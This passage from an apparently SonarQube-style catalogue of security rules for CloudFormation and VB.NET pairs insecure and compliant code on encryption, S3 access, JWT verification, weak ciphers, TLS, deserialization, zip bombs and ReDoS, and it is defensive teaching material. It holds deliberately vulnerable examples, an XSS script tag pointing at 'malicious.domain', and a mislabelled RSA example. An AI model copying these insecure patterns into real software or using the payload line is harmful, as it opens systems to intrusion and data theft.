      LogPublishingOptions:
        AUDIT_LOGS:
          CloudWatchLogsLogGroupArn: 'arn:aws:logs:us-east-1:1234:log-group:es-audit-logs'
          Enabled: true

For Amazon CloudFront distributions:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  CloudFrontDistribution:
    Type: AWS::CloudFront::Distribution
    Properties:
      DistributionConfig:
        DefaultRootObject: "index.html"
        Logging:
          Bucket: "mycompliantbucket"
          Prefix: "log/cloudfront-"

For Amazon Elastic Load Balancing:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  LoadBalancer:
      Type: AWS::ElasticLoadBalancing::LoadBalancer
      Properties:
        AccessLoggingPolicy:
          Enabled: true
          S3BucketName: mycompliantbucket
          S3BucketPrefix: "log/loadbalancer-"

For Amazon Load Balancing (v2):

AWSTemplateFormatVersion: 2010-09-09
Resources:
  ApplicationLoadBalancer:
   Type: AWS::ElasticLoadBalancingV2::LoadBalancer
   Properties:
     Name: CompliantLoadBalancer
     LoadBalancerAttributes:
       - Key: "access_logs.s3.enabled"
         Value: true
       - Key: "access_logs.s3.bucket"
         Value: "mycompliantbucket"
       - Key: "access_logs.s3.prefix"
         Value: "log/elbv2-"

See

cloudformation:S6319

Amazon SageMaker is a managed machine learning service in a hosted production-ready environment. To train machine learning models, SageMaker instances can process potentially sensitive data, such as personal information that should not be stored unencrypted. In the event that adversaries physically access the storage media, they cannot decrypt encrypted data.

Ask Yourself Whether

  • The instance contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SageMaker notebook instances that contain sensitive information. Encryption and decryption are handled transparently by SageMaker, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::SageMaker::NotebookInstance:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Notebook:  # Sensitive, encryption disabled by default
    Type: AWS::SageMaker::NotebookInstance

Compliant Solution

For AWS::SageMaker::NotebookInstance:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Notebook:
    Type: AWS::SageMaker::NotebookInstance
    Properties:
      KmsKeyId:
        Fn::GetAtt:
          - SomeKey
          - KeyId

See

cloudformation:S6330

Amazon Simple Queue Service (SQS) is a managed message queuing service for application-to-application (A2A) communication. Amazon SQS can store messages encrypted as soon as they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message from the file system, for example through a vulnerability in the service, they are not able to access the data.

Ask Yourself Whether

  • The queue contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SQS queues that contain sensitive information. Encryption and decryption are handled transparently by SQS, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::SQS::Queue:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Queue:  # Sensitive, encryption disabled by default
    Type: AWS::SQS::Queue
    Properties:
      DisplayName: "unencrypted_queue"

Compliant Solution

For AWS::SQS::Queue:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Queue:
    Type: AWS::SQS::Queue
    Properties:
      DisplayName: "encrypted_queue"
      KmsMasterKeyId:
        Fn::GetAtt:
          - TestKey
          - KeyId

See

cloudformation:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For AWS::EC2::Volume:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume
    Properties:
      Encrypted: false  # Sensitive
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume  # Sensitive as encryption is disabled by default

Compliant Solution

For AWS::EC2::Volume:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Ec2Volume:
    Type: AWS::EC2::Volume
    Properties:
      Encrypted: true

See

cloudformation:S6252

S3 buckets can be in three states related to versioning:

  • unversioned (default one)
  • enabled
  • suspended

When the S3 bucket is unversioned or has versioning suspended it means that a new version of an object overwrites an existing one in the S3 bucket.

It can lead to unintentional or intentional information loss.

Ask Yourself Whether

  • The bucket stores information that require high availability.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enable S3 versioning and thus to have the possibility to retrieve and restore different versions of an object.

Sensitive Code Example

Versioning is disabled by default:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Sensitive
    Properties:
      BucketName: "Example"

Compliant Solution

Versioning is enabled:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3Bucket:
    Type: 'AWS::S3::Bucket' # Compliant
    Properties:
      BucketName: "Example"
      VersioningConfiguration:
        Status: Enabled

See

cloudformation:S6332

Amazon Elastic File System (EFS) is a serverless file system that does not require provisioning or managing storage. Stored files can be automatically encrypted by the service. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The file system contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EFS file systems that contain sensitive information. Encryption and decryption are handled transparently by EFS, so no further modifications to the application are necessary.

Sensitive Code Example

For AWS::EFS::FileSystem:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Fs:  # Sensitive, encryption disabled by default
    Type: AWS::EFS::FileSystem

Compliant Solution

For AWS::EFS::FileSystem:

AWSTemplateFormatVersion: '2010-09-09'
Resources:
  Fs:
    Type: AWS::EFS::FileSystem
    Properties:
      Encrypted: true

See

cloudformation:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant necessary permissions only to users for their required tasks. In the context of resource-based policies, list the principals that need the access and grant to them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy' # Sensitive
    Properties:
      Bucket: !Ref S3Bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS: "*" # all principals / anonymous access
            Action: "s3:PutObject" # can put object
            Resource: arn:aws:s3:::mybucket/*

Compliant Solution

This policy allows only the authorized users:

AWSTemplateFormatVersion: 2010-09-09
Resources:
  S3BucketPolicy:
    Type: 'AWS::S3::BucketPolicy' # Compliant
    Properties:
      Bucket: !Ref S3Bucket
      PolicyDocument:
        Version: "2012-10-17"
        Statement:
          - Effect: Allow
            Principal:
              AWS:
                - !Sub 'arn:aws:iam::${AWS::AccountId}:root' # only this principal
            Action: "s3:PutObject" # can put object
            Resource: arn:aws:s3:::mybucket/*

See

vbnet:S4507

Development tools and frameworks usually have options to make debugging easier for developers. Although these features are useful during development, they should never be enabled for applications deployed in production. Debug instructions or error messages can leak detailed information about the system, like the application’s path or file names.

Ask Yourself Whether

  • The code or configuration enabling the application debug features is deployed on production servers or distributed to end users.
  • The application runs by default with debug features activated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not enable debugging features on production servers.

The .Net Core framework offers multiple features which help during debug. Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage and Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage are two of them. Make sure that those features are disabled in production.

Use If env.IsDevelopment() to disable debug code.

Sensitive Code Example

This rule raises issues when the following .Net Core methods are called: Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDeveloperExceptionPage, Microsoft.AspNetCore.Builder.IApplicationBuilder.UseDatabaseErrorPage.

Imports Microsoft.AspNetCore.Builder
Imports Microsoft.AspNetCore.Hosting

Namespace MyMvcApp
    Public Class Startup
        Public Sub Configure(ByVal app As IApplicationBuilder, ByVal env As IHostingEnvironment)
            ' Those calls are Sensitive because it seems that they will run in production
            app.UseDeveloperExceptionPage() 'Sensitive
            app.UseDatabaseErrorPage() 'Sensitive
        End Sub
    End Class
End Namespace

Compliant Solution

Imports Microsoft.AspNetCore.Builder
Imports Microsoft.AspNetCore.Hosting

Namespace MyMvcApp
    Public Class Startup
        Public Sub Configure(ByVal app As IApplicationBuilder, ByVal env As IHostingEnvironment)
            If env.IsDevelopment() Then ' Compliant
                ' The following calls are ok because they are disabled in production
                app.UseDeveloperExceptionPage()
                app.UseDatabaseErrorPage()
            End If
        End Sub
    End Class
End Namespace

See

vbnet:S5042

Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will compress irrelevant data (eg: a long string of repeated bytes).

Ask Yourself Whether

Archives to expand are untrusted and:

  • There is no validation of the number of entries in the archive.
  • There is no validation of the total size of the uncompressed data.
  • There is no validation of the ratio between the compressed and uncompressed archive entry.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Define and control the ratio between compressed and uncompressed data, in general the data compression ratio for most of the legit archives is 1 to 3.
  • Define and control the threshold for maximum total size of the uncompressed data.
  • Count the number of file entries extracted from the archive and abort the extraction if their number is greater than a predefined threshold, in particular it’s not recommended to recursively expand archives (an entry of an archive could be also an archive).

Sensitive Code Example

For Each entry As ZipArchiveEntry in archive.Entries
    ' entry.FullName could contain parent directory references ".." and the destinationPath variable could become outside of the desired path
    string destinationPath = Path.GetFullPath(Path.Combine(path, entry.FullName))
    entry.ExtractToFile(destinationPath) ' Sensitive, extracts the entry to a file

    Dim stream As Stream
    stream = entry.Open() ' Sensitive, the entry is about to be extracted
Next

Compliant Solution

Const ThresholdRatio As Double = 10
Const ThresholdSize As Integer = 1024 * 1024 * 1024 ' 1 GB
Const ThresholdEntries As Integer = 10000
Dim TotalSizeArchive, TotalEntryArchive, TotalEntrySize, Cnt As Integer
Dim Buffer(1023) As Byte
Using ZipToOpen As New FileStream("ZipBomb.zip", FileMode.Open), Archive As New ZipArchive(ZipToOpen, ZipArchiveMode.Read)
    For Each Entry As ZipArchiveEntry In Archive.Entries
        Using s As Stream = Entry.Open
            TotalEntryArchive += 1
            TotalEntrySize = 0
            Do
                Cnt = s.Read(Buffer, 0, Buffer.Length)
                TotalEntrySize += Cnt
                TotalSizeArchive += Cnt
                If TotalEntrySize / Entry.CompressedLength > ThresholdRatio Then Exit Do    ' Ratio between compressed And uncompressed data Is highly suspicious, looks Like a Zip Bomb Attack
            Loop While Cnt > 0
        End Using
        If TotalSizeArchive > ThresholdSize Then Exit For       ' The uncompressed data size Is too much for the application resource capacity
        If TotalEntryArchive > ThresholdEntries Then Exit For   ' Too much entries in this archive, can lead to inodes exhaustion of the system
    Next
End Using

See

vbnet:S5773

Why is this an issue?

During the deserialization process, the state of an object will be reconstructed from the serialized data stream which can contain dangerous operations.

For example, a well-known attack vector consists in serializing an object of type TempFileCollection with arbitrary files (defined by an attacker) which will be deleted on the application deserializing this object (when the finalize() method of the TempFileCollection object is called). This kind of types are called "gadgets".

Instead of using BinaryFormatter and similar serializers, it is recommended to use safer alternatives in most of the cases, such as XmlSerializer or DataContractSerializer. If it’s not possible then try to mitigate the risk by restricting the types allowed to be deserialized:

  • by implementing an "allow-list" of types, but keep in mind that novel dangerous types are regularly discovered and this protection could be insufficient over time.
  • or/and implementing a tamper protection, such as message authentication codes (MAC). This way only objects serialized with the correct MAC hash will be deserialized.

Noncompliant code example

For BinaryFormatter, NetDataContractSerializer, SoapFormatter serializers:

Dim myBinaryFormatter = New BinaryFormatter()
myBinaryFormatter.Deserialize(stream) ' Noncompliant: a binder is not used to limit types during deserialization

JavaScriptSerializer should not use SimpleTypeResolver or other weak resolvers:

Dim serializer1 As JavaScriptSerializer = New JavaScriptSerializer(New SimpleTypeResolver()) ' Noncompliant: SimpleTypeResolver is unsecure (every types is resolved)
serializer1.Deserialize(Of ExpectedType)(json)

LosFormatter should not be used without MAC verification:

Dim formatter As LosFormatter = New LosFormatter() ' Noncompliant
formatter.Deserialize(fs)

Compliant solution

BinaryFormatter, NetDataContractSerializer , SoapFormatter serializers should use a binder implementing a whitelist approach to limit types during deserialization (at least one exception should be thrown or a null value returned):

NotInheritable Class CustomBinder
    Inherits SerializationBinder
    Public Overrides Function BindToType(assemblyName As String, typeName As String) As Type
        If Not (Equals(typeName, "type1") OrElse Equals(typeName, "type2") OrElse Equals(typeName, "type3")) Then
            Throw New SerializationException("Only type1, type2 and type3 are allowed") ' Compliant
        End If
        Return Assembly.Load(assemblyName).[GetType](typeName)
    End Function
End Class

Dim myBinaryFormatter = New BinaryFormatter()
myBinaryFormatter.Binder = New CustomBinder()
myBinaryFormatter.Deserialize(stream)

JavaScriptSerializer should use a resolver implementing a whitelist to limit types during deserialization (at least one exception should be thrown or a null value returned):

Public Class CustomSafeTypeResolver
    Inherits JavaScriptTypeResolver
    Public Overrides Function ResolveType(id As String) As Type
        If Not Equals(id, "ExpectedType") Then
            Throw New ArgumentNullException("Only ExpectedType is allowed during deserialization") ' Compliant
        End If
        Return Type.[GetType](id)
    End Function
End Class

Dim serializer As JavaScriptSerializer = New JavaScriptSerializer(New CustomSafeTypeResolver()) ' Compliant
serializer.Deserialize(Of ExpectedType)(json)

LosFormatter serializer with MAC verification:

Dim formatter As LosFormatter = New LosFormatter(True, secret) ' Compliant
formatter.Deserialize(fs)

Resources

vbnet:S5659

This vulnerability allows forging of JSON Web Tokens to impersonate other users.

Why is this an issue?

JSON Web Tokens (JWTs), a popular method of securely transmitting information between parties as a JSON object, can become a significant security risk when they are not properly signed with a robust cipher algorithm, left unsigned altogether, or if the signature is not verified. This vulnerability class allows malicious actors to craft fraudulent tokens, effectively impersonating user identities. In essence, the integrity of a JWT hinges on the strength and presence of its signature.

What is the potential impact?

When a JSON Web Token is not appropriately signed with a strong cipher algorithm or if the signature is not verified, it becomes a significant threat to data security and the privacy of user identities.

Impersonation of users

JWTs are commonly used to represent user authorization claims. They contain information about the user’s identity, user roles, and access rights. When these tokens are not securely signed, it allows an attacker to forge them. In essence, a weak or missing signature gives an attacker the power to craft a token that could impersonate any user. For instance, they could create a token for an administrator account, gaining access to high-level permissions and sensitive data.

Unauthorized data access

When a JWT is not securely signed, it can be tampered with by an attacker, and the integrity of the data it carries cannot be trusted. An attacker can manipulate the content of the token and grant themselves permissions they should not have, leading to unauthorized data access.

How to fix it in Jwt.Net

Code examples

The following code contains examples of JWT encoding and decoding without a strong cipher algorithm.

Noncompliant code example

Imports JWT

Public Sub Decode(decoder AS IJwtDecoder)
    Dim decoded As String = decoder.Decode(token, secret, verify:= false) ' Noncompliant
End Sub
Imports JWT

Public Sub Decode()
    Dim decoded As String = new JwtBuilder()
        .WithSecret(secret)
        .Decode(token) ' Noncompliant
End Sub

Compliant solution

Imports JWT

Public Sub Decode(decoder AS IJwtDecoder)
    Dim decoded As String = decoder.Decode(token, secret, verify:= true)
End Sub

When using JwtBuilder, make sure to call MustVerifySignature().

Imports JWT

Public Sub Decode()
    Dim decoded As String = new JwtBuilder()
        .WithSecret(secret)
        .MustVerifySignature()
        .Decode(token)
End Sub

How does this work?

Verify the signature of your tokens

Resolving a vulnerability concerning the validation of JWT token signatures is mainly about incorporating a critical step into your process: validating the signature every time a token is decoded. Just having a signed token using a secure algorithm is not enough. If you are not validating signatures, they are not serving their purpose.

Every time your application receives a JWT, it needs to decode the token to extract the information contained within. It is during this decoding process that the signature of the JWT should also be checked.

To resolve the issue follow these instructions:

  1. Use framework-specific functions for signature verification: Most programming frameworks that support JWTs provide specific functions to not only decode a token but also validate its signature simultaneously. Make sure to use these functions when handling incoming tokens.
  2. Handle invalid signatures appropriately: If a JWT’s signature does not validate correctly, it means the token is not trustworthy, indicating potential tampering. The action to take on encountering an invalid token should be denying the request carrying it and logging the event for further investigation.
  3. Incorporate signature validation in your tests: When you are writing tests for your application, include tests that check the signature validation functionality. This can help you catch any instances where signature verification might be unintentionally skipped or bypassed.

By following these practices, you can ensure the security of your application’s JWT handling process, making it resistant to attacks that rely on tampering with tokens. Validation of the signature needs to be an integral and non-negotiable part of your token handling process.

Going the extra mile

Securely store your secret keys

Ensure that your secret keys are stored securely. They should not be hard-coded into your application code or checked into your version control system. Instead, consider using environment variables, secure key management systems, or vault services.

Rotate your secret keys

Even with the strongest cipher algorithms, there is a risk that your secret keys may be compromised. Therefore, it is a good practice to periodically rotate your secret keys. By doing so, you limit the amount of time that an attacker can misuse a stolen key. When you rotate keys, be sure to allow a grace period where tokens signed with the old key are still accepted to prevent service disruptions.

Resources

Standards

vbnet:S5547

This vulnerability makes it possible that the cleartext of the encrypted message might be recoverable without prior knowledge of the key.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communication in various domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection.
  • Security during transmission or on storage devices.
  • Data integrity, general trust, and authentication.

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

The following code contains examples of algorithms that are not considered highly resistant to cryptanalysis and thus should be avoided.

Noncompliant code example

Imports System.Security.Cryptography

Public Sub Encrypt()
    Dim SimpleDES As New DESCryptoServiceProvider() ' Noncompliant
End Sub

Compliant solution

Imports System.Security.Cryptography

Public Sub Encrypt()
    Dim AES128ECB = Aes.Create()
End Sub

How does this work?

Use a secure algorithm

It is highly recommended to use an algorithm that is currently considered secure by the cryptographic community. A common choice for such an algorithm is the Advanced Encryption Standard (AES).

For block ciphers, it is not recommended to use algorithms with a block size that is smaller than 128 bits.

Resources

Standards

vbnet:S5542

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

For AES, the weakest modes are CBC (Cipher Block Chaining) and ECB

(Electronic Codebook), as they are either vulnerable to padding oracles or do not provide authentication mechanisms.

And for RSA, the weakest algorithms are either using it without padding or using the PKCS1v1.5 padding scheme.

What is the potential impact?

The cleartext of an encrypted message might be recoverable. Additionally, it might be possible to modify the cleartext of an encrypted message.

Below are some real-world scenarios that illustrate possible impacts of an attacker exploiting the vulnerability.

Theft of sensitive data

The encrypted message might contain data that is considered sensitive and should not be known to third parties.

By using a weak algorithm the likelihood that an attacker might be able to recover the cleartext drastically increases.

Additional attack surface

By modifying the cleartext of the encrypted message it might be possible for an attacker to trigger other vulnerabilities in the code. Encrypted values are often considered trusted, since under normal circumstances it would not be possible for a third party to modify them.

How to fix it in .NET

Code examples

Noncompliant code example

Example with a symmetric cipher, AES:

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim Algorithm As New AesManaged() With {
            .KeySize = 128,
            .BlockSize = 128,
            .Mode = CipherMode.ECB, ' Noncompliant
            .Padding = PaddingMode.PKCS7
            }
    End Sub
End Module

Example with an asymmetric cipher, RSA:

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim data(10) As Byte
        Dim RsaCsp = New RSACryptoServiceProvider()
        RsaCsp.Encrypt(data, False) ' Noncompliant
    End Sub
End Module

Compliant solution

For the AES symmetric cipher, use the GCM mode:

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim data(10) As Byte
        Dim Algorithm As New AesGcm(data)
    End Sub
End Module

For the RSA asymmetric cipher, use the Optimal Asymmetric Encryption Padding (OAEP):

Imports System.Security.Cryptography

Public Module Example

    Public Sub Encrypt()
        Dim data(10) As Byte
        Dim RsaCsp = New RSACryptoServiceProvider()
        RsaCsp.Encrypt(data, True) ' Noncompliant
    End Sub
End Module

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

Appropriate choices are currently the following.

For AES: Use Galois/Counter mode (GCM)

GCM mode combines encryption with authentication and integrity checks using a cryptographic hash function and provides both confidentiality and authenticity of data.

Other similar modes are:

  • CCM: Counter with CBC-MAC
  • CWC: Cipher Block Chaining with Message Authentication Code
  • EAX: Encrypt-and-Authenticate
  • IAPM: Integer Authenticated Parallelizable Mode
  • OCB: Offset Codebook Mode

It is also possible to use AES-CBC with HMAC for integrity checks. However, it

is considered more straightforward to use AES-GCM directly instead.

For RSA: use the OAEP scheme

The Optimal Asymmetric Encryption Padding scheme (OAEP) adds randomness and a secure hash function that strengthens the regular inner workings of RSA.

Resources

Articles & blog posts

Standards

vbnet:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in .NET

Code examples

Noncompliant code example

These samples use a default TLS algorithm, which is a weak cryptographical algorithm: TLSv1.0.

Imports System.Net
Imports System.Security.Authentication

Public Sub Encrypt()
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls ' Noncompliant
End Sub
Imports System.Net.Http
Imports System.Security.Authentication

Public Sub Encrypt()
    Dim Handler As New HttpClientHandler With {
        .SslProtocols = SslProtocols.Tls ' Noncompliant
    }
End Sub

Compliant solution

Imports System.Net
Imports System.Security.Authentication

Public Sub Encrypt()
    ServicePointManager.SecurityProtocol = _
        SecurityProtocolType.Tls12 _
        Or SecurityProtocolType.Tls13
End Sub
Imports System.Net.Http
Imports System.Security.Authentication

Public Sub Encrypt()
    Dim Handler As New HttpClientHandler With {
        .SslProtocols = SslProtocols.Tls12
    }
End Sub

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

vbnet:S5753

ASP.NET 1.1+ comes with a feature called Request Validation, preventing the server to accept content containing un-encoded HTML. This feature comes as a first protection layer against Cross-Site Scripting (XSS) attacks and act as a simple Web Application Firewall (WAF) rejecting requests potentially containing malicious content.

While this feature is not a silver bullet to prevent all XSS attacks, it helps to catch basic ones. It will for example prevent <script type="text/javascript" src="https://malicious.domain/payload.js"> to reach your Controller.

Note: Request Validation feature being only available for ASP.NET, no Security Hotspot is raised on ASP.NET Core applications.

Ask Yourself Whether

  • the developer doesn’t know the impact to deactivate the Request Validation feature
  • the web application accepts user-supplied data
  • all user-supplied data are not validated

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Activate the Request Validation feature for all HTTP requests

Sensitive Code Example

At Controller level:

<ValidateInput(False)>
Public Function Welcome(Name As String) As ActionResult
  ...
End Function

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="false" />
      ...
      <httpRuntime requestValidationMode="0.0" />
   </system.web>
</configuration>

Compliant Solution

At Controller level:

<ValidateInput(True)>
Public Function Welcome(Name As String) As ActionResult
  ...
End Function

or

Public Function Welcome(Name As String) As ActionResult
  ...
End Function

At application level, configured in the Web.config file:

<configuration>
   <system.web>
      <pages validateRequest="true" />
      ...
      <httpRuntime requestValidationMode="4.5" />
   </system.web>
</configuration>

See

vbnet:S4784

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine performance decrease with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using.

If the regular expression is vulnerable to ReDos attacks, mitigate the risk by using a "match timeout" to limit the time spent running the regular expression.

Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Sensitive Code Example

Imports System
Imports System.Collections.Generic
Imports System.Linq
Imports System.Runtime.Serialization
Imports System.Text.RegularExpressions
Imports System.Web

Namespace N
    Public Class RegularExpression
        Private Sub Foo(ByVal pattern As String, ByVal options As RegexOptions, ByVal matchTimeout As TimeSpan,
                        ByVal input As String, ByVal replacement As String, ByVal evaluator As MatchEvaluator)
            ' All the following instantiations are Sensitive. Validate the regular expression and matched input.
            Dim r As Regex = New System.Text.RegularExpressions.Regex("(a+)+b")
            r = New System.Text.RegularExpressions.Regex("(a+)+b", options)
            r = New System.Text.RegularExpressions.Regex("(a+)+b", options, matchTimeout)

            ' All the following static methods are Sensitive.
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+b", options, matchTimeout)

            System.Text.RegularExpressions.Regex.Match(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+b", options, matchTimeout)

            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+b", options, matchTimeout)

            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", evaluator)
